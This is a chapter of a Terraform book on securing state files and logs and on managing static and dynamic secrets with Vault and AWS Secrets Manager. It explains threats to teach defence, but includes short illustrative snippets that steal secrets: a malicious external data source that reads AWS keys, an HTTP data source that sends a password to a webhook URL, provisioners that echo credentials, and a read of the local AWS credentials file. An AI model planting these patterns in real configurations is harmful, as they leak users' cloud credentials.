On July 25, 2019, the Democratic Senatorial Campaign Committee (DSCC) was discovered to have exposed over 6.2 million email addresses. It was one of the largest data breaches of all time. The vast majority of exposed email addresses belonged to average Americans, although thousands of university, government, and military personnel’s emails were leaked as well. The root cause of the incident was a publicly accessible S3 bucket. Anyone with an Amazon Web Services (AWS) account could access the emails stored in a spreadsheet named EmailExcludeClinton.csv. At the time of the discovery, the data had been exposed for at least nine years, based on the last-modified date of 2010.
This homily should serve as a warning to those who fail to take information security seriously. Data breaches are enormously detrimental, not only to the public but to corporations as well. Loss of brand reputation, loss of revenue, and government-imposed fines are just some of the potential consequences. Vigilance is required because all it takes for a data breach to occur is a slight oversight, such as an improperly configured S3 bucket that hasn’t been used for years.
Security is everybody’s responsibility. But as a Terraform developer, your share of the responsibility is greater than most. Terraform is an infrastructure provisioning technology and therefore handles a lot of secrets—more than most people realize. Secrets like database passwords, personal identification information (PII), and encryption keys may all be consumed and managed by Terraform. Worse, many of these secrets appear as plaintext, either in Terraform state or in log files. Knowing how and where secrets have the potential to be leaked is critical to developing an effective counter-strategy. You have to think like a hacker to protect yourself from a hacker.
Secrets management is about keeping your secret information secret. Best practices for secrets management with Terraform, as we discuss in this chapter, include the following:
Sensitive information will inevitably find its way into Terraform state pretty much no matter what you do. Terraform is fundamentally a state-management tool, so to perform basic execution tasks like drift detection, it needs to compare previous state with current state. Terraform does not treat attributes containing sensitive data any differently than it treats non-sensitive attributes. Therefore, any and all sensitive data is put in the state file, which is stored as plaintext JSON. Because you can’t prevent secrets from making their way into Terraform state, it’s imperative that you treat the state file as sensitive and secure it accordingly. In this section, we discuss three methods for securing state files:
Although you ultimately cannot avoid secrets from wheedling their way into Terraform state, there’s no excuse for complacency. You should never expose more sensitive information than is absolutely required. If the worst were to happen and, despite your best efforts and safety precautions, the contents of your state file were to be leaked, it is better to expose one secret than a dozen (or a hundred).
Tip Fewer secrets means you have less to lose in the event of a data breach.
To minimize the number of secrets stored in Terraform state, you first have to know what can be stored in Terraform state. Fortunately, it’s not a long list. Only three configuration blocks can store stateful information (sensitive or otherwise) in Terraform: resources, data sources, and output values. Other kinds of configuration blocks (providers, input variables, local values, modules, etc.) do not store stateful data. Any of these other blocks may leak sensitive information in other ways, but at least you do not need to worry about them saving sensitive information to the state file.
Now that you know which blocks have the potential to store sensitive information in Terraform, you have to determine which secrets are necessary and which are not. Much of this depends on the level of risk you are willing to accept and the kinds of resources you are managing with Terraform. An example of a necessary secret is shown next. This code declares a Relational Database Service (RDS) database instance and passes in two secrets: var.username
and var.password
. Since both of these attributes are defined as required
, if you want Terraform to provision an RDS database, you must be willing to accept that your master username and password secret values exist in Terraform state:
resource "aws_db_instance" "database" { allocated_storage = 20 engine = "postgres" engine_version = "9.5" instance_class = "db.t3.medium" name = "ptfe" username = var.username ❶ password = var.password ❶ }
❶ username and password are attributes of the aws_db_instance resource. These are necessary secrets because it is impossible to provision this resource without storing the values in Terraform state.
Note Defining your variables as sensitive does not prevent them from being stored in Terraform state.
The following listing shows Terraform state for a deployed RDS instance. Notice that username
and password
appear in plaintext.
Listing 13.1 aws_db_instance in Terraform state
{ "mode": "managed", "type": "aws_db_instance", "name": "database", "provider": "provider.aws", "instances": [ { "schema_version": 1, "attributes": { //not all attributes are shown "password": "hunter2", ❶ "performance_insights_enabled": false, "performance_insights_kms_key_id": "", "performance_insights_retention_period": 0, "port": 5432, "publicly_accessible": false, "replicas": [], "replicate_source_db": "", "resource_id": "db-O6TUYBMS2HGAY7GKSLTL5H4JEM", "s3_import": [], "security_group_names": null, "skip_final_snapshot": false, "snapshot_identifier": null, "status": "available", "storage_encrypted": false, "storage_type": "gp2", "tags": null, "timeouts": null, "timezone": "", "username": "admin" ❷ } } ] }
❶ username and password appear as plaintext in Terraform state.
❷ username and password appear as plaintext in Terraform state.
Setting secrets on a database instance may be unavoidable, but there are plenty of avoidable situations. For example, you should never pass the RDS database username and password to a lambda function as environment variables. Consider the following code, which declares an aws_lamba_function
resource that has username
and password
set as environment variables.
Listing 13.2 Lambda function configuration code
resource "aws_lambda_function" "lambda" {
filename = "code.zip"
function_name = "${local.namespace}-lambda"
role = aws_iam_role.lambda.arn
handler = "exports.main"
source_code_hash = filebase64sha256("code.zip")
runtime = "nodejs12.x"
environment {
variables = {
USERNAME = var.username ❶
PASSWORD = var.password
}
}
}
❶ RDS database username and password set as environment variables
Since the environment block of aws_lambda_function
contains these values, they will be stored in state just as they were for the database. The difference is that while the RDS database required username
and password
to be set, the AWS Lambda function does not. The Lambda function only needs credentials to connect to the database instance at runtime.
You might think this is excessive and possibly redundant. After all, if you are declaring the RDS instance in the same configuration code as your AWS Lambda function, wouldn’t the sensitive information be stored in Terraform state regardless? And you would be right. But you would also be exposing yourself to additional vulnerabilities outside of Terraform. If you aren’t familiar with AWS Lambda, environment variables on Lambda functions are exposed to anyone with read access to that resource (see figure 13.1).
Figure 13.1 Environment variables for AWS Lambda functions are visible to anyone with read access in the console. Avoid setting secrets as environment variables in AWS Lambda whenever possible.
Granted, people with read access to your AWS account tend to be coworkers and trusted contractors, but do you really want to risk exposing sensitive information that way? I recommend adopting a zero-trust policy, even within your team. A better solution would be to read secrets dynamically from a centralized secrets store.
We can remove USERNAME
and PASSWORD
from the environment block by replacing them with a key that tells AWS Lambda where to find the secrets, such as AWS Secrets Manager. AWS Secrets Manager is a secret store not unlike Vault (Azure and Google Cloud Platform [GCP] have equivalents). To use AWS Secrets Manager, we will need to give permissions to Lambda to read from Secrets Manager and add a few lines of boilerplate to the Lambda source code. This will prevent secrets from showing up in the state file and prevent other avenues of sensitive information leakage, such as through the AWS console.
The following listing shows aws_lambda_function
refactored to use a SECRET_ID
pointing to a secret stored in AWS Secrets Manager.
Listing 13.3 Lambda function configuration code
resource "aws_lambda_function" "lambda" { filename = "code.zip" function_name = "${local.namespace}-lambda" role = aws_iam_role.lambda.arn handler = "exports.main" source_code_hash = filebase64sha256("code.zip") runtime = "nodejs12.x" environment { variables = { SECRET_ID = var.secret_id ❶ } } }
❶ No more secrets in the configuration code! This is an ID for where to fetch the secrets.
Now, in the application source code, SECRET_ID
can be used to fetch the secret at runtime (see listing 13.4).
Note For this to work, AWS Lambda needs to be given permission to fetch the secret value from AWS Secrets Manager.
Listing 13.4 Lambda function source code
package main
import (
"context"
"fmt"
"os"
"github.com/aws/aws-lambda-go/lambda"
"github.com/aws/aws-sdk-go/aws"
"github.com/aws/aws-sdk-go/aws/session"
"github.com/aws/aws-sdk-go/service/secretsmanager"
)
func HandleRequest(ctx context.Context) error {
client := secretsmanager.New(session.New())
config := &secretsmanager.GetSecretValueInput{
SecretId: aws.String(os.Getenv("SECRET_ID")),
}
val, err := client.GetSecretValue(config) ❶
if err != nil {
return err
}
// do something with secret value
fmt.Printf("Secret is: %s", *val.SecretString)
return nil
}
func main() {
lambda.Start(HandleRequest)
}
❶ Fetches the secret dynamically by ID
We formally introduce AWS Secrets Manager later when we talk about managing dynamic secrets in Terraform.
Removing unnecessary secrets is always a good idea, but it won’t prevent your state file from being exposed in the first place. To do that, you need to treat the state file as secret and gate who has access to it. After all, you don’t want just anyone accessing your state file. Users should only be able to access state files that they need access to. In general, a principle of least privilege should be upheld, meaning users and service accounts should have only the minimal privileges required to do their jobs.
In chapter 6, we did exactly this when we created a module for deploying an S3 backend. As part of this module, we restricted access to the S3 bucket to just the account that required access to it. The S3 bucket holds the state files, and although we want to give read/write access to some state files, we may not want to give that access to all users. The next listing shows an example of the policy we created for enabling least-privileged access.
Listing 13.5 IAM least-privileged policy for the S3 backend
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::tia-state-bucket"
},
{
"Sid": "",
"Effect": "Allow",
"Action": [
"s3:PutObject",
"s3:GetObject"
],
"Resource": "arn:aws:s3:::tia-state-bucket/team1/*" ❶
},
{
"Sid": "",
"Effect": "Allow",
"Action": [
"dynamodb:PutItem",
"dynamodb:GetItem",
"dynamodb:DeleteItem"
],
"Resource":
"arn:aws:dynamodb:us-west-2:215974853022:table/tia-state-lock"
}
]
}
❶ This could be further restricted with a bucket prefix if desired.
Terraform Cloud and Terraform Enterprise allow you to restrict user access to state files with team access settings. The basic idea is that users are added to teams, and the teams grant read/write/admin access to specific workspaces and their associated state files. People who are not on an authorized team will be unable to read the state file. For more information about how teams and team access work, refer to the official HashiCorp documentation (http://mng.bz/0r4p).
TIP In addition to securing state files, you can create least-privileged deployment roles for users and service accounts. We did this in chapter 12 with the helloworld.json policy.
Encryption at rest is the act of translating data into a format that cannot be decrypted except by authorized users (see figure 13.2). Even if a malicious user were to gain physical access to the machines storing encrypted data, the data would be useless to them.
Figure 13.2 Data must be encrypted every step of the way. Most Terraform backends take care of data in transit, but you are responsible for ensuring that data is encrypted at rest.
Encryption at rest is easy to enable for most backends. If you are using an S3 backend like the one we created in chapter 6, you can specify a Key Management Service (KMS) key to use client-side encryption or just let S3 use a default encryption key for server-side encryption. If you are using Terraform Cloud or Terraform Enterprise, your data is automatically encrypted at rest by default. In fact, it’s double encrypted: once with KMS and again with Vault. For other remote backends, you will need to consult the documentation to learn how to enable encryption at rest.
Insecure log files pose an enormous security risk—but, surprisingly, many people aren’t aware of the danger. By reading Terraform log files, malicious users can glean sensitive information about your deployment, such as credentials and environment variables, and use them against you (see figure 13.3). In this section, we discuss how sensitive information can be leaked through insecure log files and what you can do to prevent it.
Figure 13.3 A malicious user can steal credentials from log files to make unauthorized API calls to AWS.
People are often shocked to learn that sensitive information appears in log files. The official documentation and online blog articles focus on the importance of securing the state file, but little is said about the importance of securing logs. Let’s look at an example of how secrets can be leaked in logs. Consider the following configuration code snippet, which declares a simple “Hello World!” EC2 instance:
resource "aws_instance" "helloworld" { ami = var.ami_id instance_type = "t2.micro" tags = { Name = "HelloWorld" } }
If you were to create this resource without enabling trace logging, the logs would be short and relatively uninteresting:
$ terraform apply -auto-approve
aws_instance.helloworld: Creating...
aws_instance.helloworld: Still creating... [10s elapsed]
aws_instance.helloworld: Still creating... [20s elapsed]
aws_instance.helloworld: Creation complete after 24s [id=i-002030c2b40edd6bb]
Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
On the other hand, if you were to run the same configuration code with trace logs enabled (TF_LOG=trace
), you would find information in the logs about the current caller identity, temporary signed access credentials, and response data from all requests made to deploy the EC2 instance. The following listing shows an excerpt.
Listing 13.6 sts:GetCallerIdentity in trace level logs
Trying to get account information via sts:GetCallerIdentity [aws-sdk-go] DEBUG: Request sts/GetCallerIdentity Details: ---[ REQUEST POST-SIGN ]----------------------------- POST / HTTP/1.1 Host: sts.amazonaws.com User-Agent: aws-sdk-go/1.30.16 (go1.13.7; darwin; amd64) APN/1.0 HashiCorp/1.0 Terraform/0.12.24 (+https://www.terraform.io) Content-Length: 43 Authorization: AWS4-HMAC-SHA256 Credential=AKIATESI2XGPMMVVB7XL/20200504/us-east-1/sts/aws4_request, B SignedHeaders=content-length;content-type;host;x-amz-date, ❶ Signature=c4df301a200eb46d278ce1b6b9ead1cfbe64f045caf9934a14e9b7f8c207c3f8 ❶ Content-Type: application/x-www-form-urlencoded; charset=utf-8 X-Amz-Date: 20200504T084221Z Accept-Encoding: gzip Action=GetCallerIdentity&Version=2011-06-15 ----------------------------------------------------- [aws-sdk-go] DEBUG: Response sts/GetCallerIdentity Details: ---[ RESPONSE ]-------------------------------------- HTTP/1.1 200 OK Connection: close Content-Length: 405 Content-Type: text/xml Date: Mon, 04 May 2020 07:37:21 GMT X-Amzn-Requestid: 74b2886b-43bc-475c-bda3-846123059142 ----------------------------------------------------- [aws-sdk-go] <GetCallerIdentityResponse xmlns="https://sts.amazonaws.com/doc/2011-06-15/"> <GetCallerIdentityResult> <Arn>arn:aws:iam::215974853022:user/swinkler</Arn> ❷ <UserId>AIDAJKZ3K7CTQHZ5F4F52</UserId> ❷ <Account>215974853022</Account> ❷ </GetCallerIdentityResult> <ResponseMetadata> <RequestId>74b2886b-43bc-475c-bda3-846123059142</RequestId> </ResponseMetadata> </GetCallerIdentityResponse>
❶ Temporary signed credentials that can be used to make a request on your behalf
❷ Information about the current caller identity
The temporary signed credentials that appear in the trace logs can be used to make authorized API requests (at least until they expire, which is in about 15 minutes).
The next listing demonstrates using the previous credentials to make a curl request and the response from the server.
Listing 13.7 Invoking sts:GetCallerIdentity with signed credentials
$ curl -L -X POST 'https://sts.amazonaws.com' -H 'Host: sts.amazonaws.com' AWS4-HMAC-SHA256 Credential=AKIATESI2XGPMMVVB7XL/20200504/us-east-1/sts/aws4_request, SignedHeaders=content-length;content-type;host;x-amz-date, Signature=c4df301a200eb46d278ce1b6b9ead1cfbe64f045caf9934a14e9b7f8c207c3f8' -H 'Content-Type: application/x-www-form-urlencoded; charset=utf-8' 20200504T084221Z' -H 'Accept-Encoding: gzip' --data-urlencode 'Action=GetCallerIdentity' --data-urlencode 'Version=2011-06-15' <GetCallerIdentityResponse xmlns="https://sts.amazonaws.com/doc/2011-06-15/"> <GetCallerIdentityResult> <Arn>arn:aws:iam::215974853022:user/swinkler</Arn> <UserId>AIDAJKZ3K7CTQHZ5F4F52</UserId> <Account>215974853022</Account> </GetCallerIdentityResult> <ResponseMetadata> <RequestId>e6870ff6-a09e-4479-8860-c3ca08b323b5</RequestId> </ResponseMetadata> </GetCallerIdentityResponse>
I know what you might be thinking: what if someone gets access to invoke sts:GetCallerIdentity
? Keeping it a secret is not that important—but sts:GetCallerIdentity
is just the beginning! Every API call that Terraform makes to AWS will appear in the trace logs along with the complete request and response objects. That means for the “Hello World!” deployment, signed credentials allowing someone to invoke ec2:CreateInstance
and vpc:DescribeVpcs
appear as well. Granted, these are temporary credentials that expire in 15 minutes, but risks are risks!
TIP Always turn off trace logging except when debugging.
In chapter 7, we introduced local-exec
provisioners and how they can be used to execute commands on a local machine during terraform
apply
and terraform destroy
. As previously mentioned, local-exec
provisioners are inherently dangerous and should be avoided whenever possible. Now I will give you one more reason to be wary of them: even when trace logging is disabled, local-exec
provisioners can be used to print secrets in the log files.
Consider this snippet, which declares a null_resource
with an attached local-exec
provisioner:
resource "null_resource" "uh_oh" { provisioner "local-exec" { command = <<-EOF echo "access_key=$AWS_ACCESS_KEY_ID" echo "secret_key=$AWS_SECRET_ACCESS_KEY" EOF } }
If you ran this, you would see the following during terraform
apply
(even when trace logging is disabled):
$ terraform apply -auto-approve null_resource.uh_oh: Creating... null_resource.uh_oh: Provisioning with 'local-exec'... null_resource.uh_oh (local-exec): Executing: ["/bin/sh" "-c" "echo "access_key=$AWS_ACCESS_KEY_ID" echo "secret_key=$AWS_SECRET_ACCESS_KEY" "] null_resource.uh_oh (local-exec): access_key=ASIAQHUM6YXTDSEUEMUJ ❶ null_resource.uh_oh (local-exec): ❷ secret_key=ILjkhTbflyPdxkvWJl9NV8qZXPJ+yVM3JSq3Uaz1 ❷ null_resource.uh_oh: Creation complete after 0s [id=5973892021553480485] Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
Note AWS access keys are not the only things local-exec
provisioners can expose. Any secret stored on the machine running Terraform is at risk.
Somewhat related to local-exec
provisioners are external data sources. In case you aren’t aware of these dodgy characters, external data sources allow you to execute arbitrary code and return the results to Terraform. That sounds great at first because you can create custom data sources without resorting to writing your own Terraform provider. The downside is that any arbitrary code can be called, which can be extremely troublesome if you are not careful (see figure 13.4).
Figure 13.4 External data sources execute arbitrary code (such as Python, JavaScript, Bash, etc.) and return the results to Terraform. If the code is malicious, it can cause all sorts of problems before you have a chance to do anything about it.
TIP If you are interested in creating custom resources without writing your own provider, I recommend using the Shell provider for Terraform (https://github.com/scottwinkler/terraform-provider-shell; see appendix D).
External data sources are particularly nefarious because they run during terraform plan
, which means all a malicious user would need to do to gain access to all your secrets is sneak this code into your configuration and make sure terraform plan
is run. No apply
is required.
TIP Always skim through any module you want to use, even if it comes from the official module registry, to ensure that no malicious code is present.
Consider this code, which doesn’t look that bad at first glance:
data "external" "do_bad_stuff" { program = ["node", "${path.module}/run.js"] }
During terraform
plan
, this data source could run a Node.js script to execute malicious code. Here’s an example of what the external script might do:
// runKeyLogger() // stealBankingInformation() // emailNigerianPrince() console.log(JSON.stringify({ AWS_ACCESS_KEY_ID: process.env.AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY: process.env.AWS_SECRET_ACCESS_KEY, }))
When this code runs, it can do anything from installing viruses to stealing your private data to mining bitcoins. In this example, the code just returns a JSON object with the AWS access and secret access keys in tow (which is still nasty!). If you were to run this, nothing of interest would show up in the logs:
$ terraform apply -auto-approve data.external.do_bad_stuff: Refreshing state... Apply complete! Resources: 0 added, 0 changed, 0 destroyed.
But in your state file, the data would appear in plaintext:
$ terraform state show data.external.do_bad_stuff
# data.external.do_bad_stuff:
data "external" "do_bad_stuff" {
id = "-"
program = [
"node",
"./run.js",
]
result = {
"AWS_ACCESS_KEY_ID" = "ASIAQHUM6YXTDSEUEMUJ"
"AWS_SECRET_ACCESS_KEY" = "ILjkhTbflyPdxkvWJl9NV8qZXPJ+yVM3JSq3Uaz1"
}
}
That’s not the end of it. The sensitive information could also appear in the logs, if trace logging were enabled:
JSON output: [123 34 65 87 83 95 65 67 67 69 83 83 95 75 69 89 95 73 68 34 58 34 65 83 73 65 81 72 85 77 54 89 88 84 68 83 69 85 69 77 85 74 34 44 34 65 87 83 95 83 69 67 82 69 84 95 65 67 67 69 83 83 95 75 69 89 34 58 34 73 76 106 107 104 84 98 102 108 121 80 100 120 107 118 87 74 108 57 78 86 56 113 90 88 80 74 43 121 86 77 51 74 83 113 51 85 97 122 49 34 125 10]
Converting this byte array to a string yields the following JSON string:
{ "AWS_ACCESS_KEY_ID": "ASIAQHUM6YXTDSEUEMUJ", "AWS_SECRET_ACCESS_KEY": "ILjkhTbflyPdxkvWJl9NV8qZXPJ+yVM3JSq3Uaz1" }
Note External data sources are perhaps the most dangerous resources in all of Terraform. Be extremely judicious with their use, as there are many clever and devious ways that sensitive information could be leaked with them.
The HTTP provider is a utility provider for interacting with generic HTTP servers as part of Terraform configuration. It exposes a single http_http
data source that makes a GET
request to a given URL and exports information about the response. This data source is meant to merely fetch data, but it could easily be abused to steal sensitive information, much like the external data source. For example, you could do a GET
request with a query string parameter to redirect sensitive information. Effectively, whoever owns the API will get their hands on your sensitive information whenever terraform plan
is run:
variable "password" {
type = string
sensitive = true
default = "hunter2"
}
data "http" "password" {
url = "https://webhook.site/440255d9?pw=${var.password}" ❶
request_headers = {
Accept = "application/json"
}
}
❶ Performs a GET with your password against a custom API
Many of the same rules for securing state files also apply to log files: you don’t want people reading log files if it’s not required to do their job, and you want to encrypt data at rest and in transit so there is no possibility of hackers or eavesdroppers gaining access to your data. Here are some additional guidelines specific to securing log files:
Do not allow unauthorized users to run plan
or apply
against your workspace.
If you have continuous integration webhooks set up on a repository, do not allow terraform plan
to be run from pull requests (PRs) initiated from forks. This would allow hackers to run external or HTTP data sources even without you having merged a PR.
TIP Relax, I’m not trying to scare you. Not many people know about these exploits, and of the few who do, probably none have reason to cause you harm. Use your best judgment, and don’t take any unnecessary risks.
Static secrets are sensitive values that do not change, or at least do not change often. Most secrets can be classified as static secrets. Things like username and passwords, long-lived oAuth tokens, and config files containing credentials are all examples of static secrets. In this section, we discuss some of the different ways to manage static secrets as well as an overview of how to effectively rotate static secrets.
There are two major ways to pass static secrets into Terraform: as environment variables and as Terraform variables. I recommend passing secrets as environment variables whenever possible because it is far safer than the alternative. Environment variables do not show up in the state or plan files, and it’s harder for malicious users to access your sensitive values as compared to Terraform variables. In the previous section, we discussed how environment variables could be leaked with local-exec
provisioners, external data sources, and the HTTP provider, but these risks can be mitigated with careful code reviews or Sentinel policies (as we will see in section 13.5).
As safe as environment variables tend to be, with few exceptions they can only configure secrets in Terraform providers. Some rare resources have the ability to read variables from the environment as well, and you will know if you come across one.
Note As discussed in chapter 12, it’s possible to set Terraform variables with environment variables, but this does not help from a security point of view.
When configuring a Terraform provider, you definitely do not want to pass sensitive information as regular Terraform variables:
provider "aws" { region = "us-west-2" access_key = var.access_key ❶ secret_key = var.secret_key ❶ }
Configuring sensitive information in providers with Terraform variables is inherently dangerous because it opens you up to the possibility of someone redirecting secrets and using them elsewhere. Consider how easy it is for someone to output the AWS access and secret access keys simply by adding the following lines to the configuration code:
output "aws" { value = { access_key = var.access_key, secret_key = var.secret_key } }
Another possibility is saving the contents to a local_file
resource
resource "local_file" "aws" { filename = "credentials.txt" content = <<-EOF access_key = ${var.access_key} secret_key = ${var.secret_key} EOF }
or even uploading to an S3 bucket:
resource "aws_s3_bucket_object" "aws" { key = "creds.txt" bucket = var.bucket_name content = <<-EOF access_key = ${var.access_key} secret_key = ${var.secret_key} EOF }
As you can see, it doesn’t take a genius to be able to read sensitive information from Terraform variables. The avenues of attack are so numerous that it’s nearly impossible to develop an effective governance strategy. Anyone with access to modify your configuration code or run plan
and apply
on your workspace can easily steal secret values.
The recommended approach is therefore to configure providers using environment variables:
provider "aws" {
region = "us-west-2" ❶
}
❶ The access key and secret key are set as environment variables instead of Terraform variables.
It’s worth mentioning that some providers allow you to set secret information in other ways, such as through a config file. This works fine for most use cases but can be a little awkward when running Terraform in automation. You should also be aware that nothing on your machine is truly secret, config files included. Consider the following code, which declares a local_file
data source to read data from an AWS credentials file:
data "local_file" "credentials" { filename = "/Users/Admin/.aws/credentials" }
I know this example is a bit contrived, and I doubt you will ever encounter this exact situation yourself, but it is something to be aware of, nonetheless. Just because a file is “hidden” on your filesystem doesn’t mean Terraform can’t access it (see figure 13.5).
Figure 13.5 No secret is safe from the prying eye of Terraform.
Warning Malicious Terraform code can access any secret stored on a local machine running Terraform!
Despite all the shortcomings of Terraform variables, sometimes you do not have a choice in the matter. Recall the database instance we declared earlier:
resource "aws_db_instance" "database" { allocated_storage = 20 engine = "postgres" engine_version = "9.5" instance_class = "db.t3.medium" name = "ptfe" username = var.username ❶ password = var.password ❶ }
❶ Cannot be set from environment variables
If you wish to deploy an RDS database, you are stuck setting username
and password
as Terraform variables, since there is no option for using environment variables. In this case, you can still use Terraform variables to set sensitive information as long as you are smart about it.
First, I recommend running Terraform in automation, if you are not already doing so. It is imperative that a single source of truth be maintained for configuration code in Terraform state. You do not want people deploying Terraform from their local machines, even if they are using a remote backend like S3. By ensuring that Terraform runs are always linked to a specific Git commit, you prevent troublemakers from inserting malicious code without leaving behind incriminating evidence in the Git history.
After running Terraform in automation, you should seek to isolate sensitive Terraform variables from non-sensitive Terraform variables. Terraform Cloud and Terraform Enterprise make this easy because they let you mark variables as sensitive when creating through the UI/API. Figure 13.6 shows this in action.
Figure 13.6 Terraform variables can be marked as sensitive by clicking the Sensitive check box.
If you aren’t using Terraform Cloud or Terraform Enterprise, you will have to segregate sensitive Terraform variables yourself. One way to accomplish this is by deploying workspaces with multiple variable-definition files. Terraform does not automatically load variable-definition files with any name other than terraform.tfvars (or *.auto.tfvars), but you can specify other files using the -var-file flag. For instance, if you have non-sensitive data stored in production.tfvars (possibly checked into Git) and sensitive data stored in secrets.tfvars (definitely not checked into Git), the following command will do the trick:
$ terraform apply \
    -var-file="secrets.tfvars" \
    -var-file="production.tfvars"
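As a sketch, the split between the two files might look like this (the non-sensitive variable names are illustrative):

```hcl
# production.tfvars -- safe to check into Git
region         = "us-west-2"
instance_class = "db.t3.medium"

# secrets.tfvars -- never check into Git (add it to .gitignore)
username = "admin"
password = "hunter2"
```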
Sensitive variables can be defined by setting the sensitive argument to true:
variable "password" {
  type      = string
  sensitive = true
}
Variables defined as sensitive appear in Terraform state but are redacted from CLI output. Consider the following code, which declares a sensitive variable and attempts to print it out with a local-exec provisioner:
variable "password" {
  type      = string
  sensitive = true
  default   = "hunter2"
}

resource "null_resource" "safe" {
  provisioner "local-exec" {
    command = "echo ${var.password}"
  }
}
This code behaves as expected, with the secret suppressed in the CLI output:
$ terraform apply -auto-approve
null_resource.safe: Creating...
null_resource.safe: Provisioning with 'local-exec'...
null_resource.safe (local-exec): (output suppressed due to sensitive value in config)
null_resource.safe (local-exec): (output suppressed due to sensitive value in config)
null_resource.safe: Creation complete after 0s [id=3800487680631318804]

Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
Defining a variable as sensitive prevents users from accidentally exposing secrets but does not stop motivated individuals.
Consider instead the following code, which redirects var.password to a local_file before reading it back and printing it with a local-exec provisioner:
variable "password" {
  type      = string
  sensitive = true
  default   = "hunter2"
}

resource "local_file" "password" {    ❶
  filename = "password.txt"
  content  = var.password
}

data "local_file" "password" {
  filename = local_file.password.filename    ❷
}

resource "null_resource" "uh_oh" {
  provisioner "local-exec" {
    command = "echo ${data.local_file.password.content}"    ❸
  }
}
❶ Redirects a secret to a local file
❷ Reads the secret from the local file
❸ Prints the redirected secret
You might be surprised to learn that the sensitive value is not obfuscated in the logs:
$ terraform apply -auto-approve
local_file.password: Creating...
local_file.password: Creation complete after 0s [id=f3bbbd66a63d4bf1747940578ec3d0103530e21d]
data.local_file.password: Reading...
data.local_file.password: Read complete after 0s [id=f3bbbd66a63d4bf1747940578ec3d0103530e21d]
null_resource.uh_oh: Creating...
null_resource.uh_oh: Provisioning with 'local-exec'...
null_resource.uh_oh (local-exec): Executing: ["/bin/sh" "-c" "echo hunter2"]
null_resource.uh_oh (local-exec): hunter2
null_resource.uh_oh: Creation complete after 0s [id=4946082416658079188]

Apply complete! Resources: 2 added, 0 changed, 0 destroyed.
This is because Terraform does not simply perform a find-and-replace to scrub secrets: it scrubs references to secrets. If you go through an intermediary, Terraform loses track of the reference, and the value is no longer suppressed the way it is supposed to be.
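This reference tracking also works in the forward direction: in recent Terraform versions, an output value that derives from a sensitive variable must itself be marked sensitive, or Terraform refuses to apply. A minimal sketch:

```hcl
variable "password" {
  type      = string
  sensitive = true
}

output "db_password" {
  value     = var.password
  sensitive = true # omitting this line is an error, because the value
                   # is derived from a sensitive input variable
}
```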
Besides local-exec provisioners, there are many other ways to redirect sensitive variables. As mentioned before, you can upload to an S3 bucket, use an external data source, or use an HTTP data source.
TIP Despite the security limitations of sensitive variables, I recommend using them whenever possible. They make it significantly harder to expose a secret accidentally.
Secrets should be rotated periodically: at least once every 90 days, or in response to known security threats. You don’t want people stealing secrets and using them indefinitely. The smaller the window of time during which a secret is valid, the better. Ideally, secrets should not even exist until they are needed (they should be created “just in time”) and should be revoked immediately after use. These are called dynamic secrets, and they are substantially more secure than static secrets.
We briefly mentioned dynamic secrets earlier, when we discussed the importance of removing unnecessary secrets from Terraform. That was more about moving secrets out of Terraform configuration and into the application layer. For dynamic secrets that cannot be moved into the application layer, the recommended approach is to use a data source that can read secrets from a secrets provider during Terraform execution.
Note If you are running Terraform in automation, you can also write custom logic for reading dynamic secrets—something that does not involve data sources.
In this section, we discuss how data sources from secrets providers like HashiCorp Vault and AWS Secrets Manager can be used to dynamically read secrets into Terraform variables.
HashiCorp Vault is a secrets-management solution that allows you to store, access, and distribute secrets by authenticating clients against various identity providers (see figure 13.7). It’s a great tool for managing static and dynamic secrets and is fast becoming the gold standard in the industry. Vault is HashiCorp’s biggest source of revenue, with over $100 million in revenue as of 2020.
Figure 13.7 Vault is a secrets-management tool that allows you to store, access, and distribute secrets by authenticating clients against various identity providers.
Operationalizing and deploying Vault is outside the scope of this book; instead, we will focus on how to integrate Terraform with an existing Vault deployment to read dynamic secrets at runtime.
Vault exposes an API for creating, reading, updating, and deleting secrets. As you might expect, this also means there’s a Vault provider for Terraform that allows managing Vault resources. The Vault provider for Terraform is no different than any other Terraform provider; you declare what you want in code, and Terraform takes care of making the backend API calls on your behalf (see figure 13.8).
Figure 13.8 The Vault provider works just like any other Terraform provider: it integrates with the API backend and exposes resources and data sources to Terraform. Some of these data sources can be used to read dynamic secrets at runtime.
Sample code for configuring the Vault provider, reading secrets from a data source, and using these secrets to configure the AWS provider is shown in listing 13.8. Every time Terraform runs, new short-lived access credentials will be obtained from Vault.
Warning All the previous rules still apply! You still have to securely manage Terraform variables, state files, and log files.
Listing 13.8 Configuring Terraform with Vault
provider "vault" {
  address = var.vault_address
}

data "vault_aws_access_credentials" "creds" {
  backend = "aws"
  role    = "prod-role"
}

provider "aws" {
  access_key = data.vault_aws_access_credentials.creds.access_key
  secret_key = data.vault_aws_access_credentials.creds.secret_key
  region     = "us-west-2"
}
Note To reduce the risk of exposing secrets, the Vault provider requests tokens with a relatively short time to live (TTL): 20 minutes by default. Any issued credentials are revoked when the token expires.
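If the default is still too generous for your environment, the Vault provider exposes a knob for it; a sketch, with an illustrative 10-minute value:

```hcl
provider "vault" {
  address = var.vault_address

  # Shorten the provider's token TTL from the default 1,200 seconds
  # (20 minutes) to 600 seconds. Credentials issued under the token
  # are revoked when it expires.
  max_lease_ttl_seconds = 600
}
```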
AWS Secrets Manager (ASM) is a notable competitor to HashiCorp Vault. It allows basic key-value storage and rotation of secrets but is generally less sophisticated than Vault and lacks many of Vault’s more advanced features. The main advantage of ASM is that it’s a managed service, which means you don’t need to stand up your own infrastructure to use it; it’s ready to go right out of the box.
Note Azure and GCP both have services comparable to ASM, and the process of using them is basically the same.
Like Vault, ASM allows you to read dynamic secrets at runtime with the help of data sources. Some sample code for doing this is shown next.
Listing 13.9 Configuring Terraform with AWS Secrets Manager
data "aws_secretsmanager_secret_version" "db" {
  secret_id = var.secret_id
}

locals {
  creds = jsondecode(data.aws_secretsmanager_secret_version.db.secret_string)
}

resource "aws_db_instance" "database" {
  allocated_storage = 20
  engine            = "postgres"
  engine_version    = "12.2"
  instance_class    = "db.t2.micro"
  name              = "ptfe"
  username          = local.creds["username"]
  password          = local.creds["password"]
}
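Listing 13.9 assumes the secret already exists in ASM as a JSON document with username and password keys. As an illustration (the secret name and values are hypothetical), you could seed it with the AWS CLI:

```shell
aws secretsmanager create-secret \
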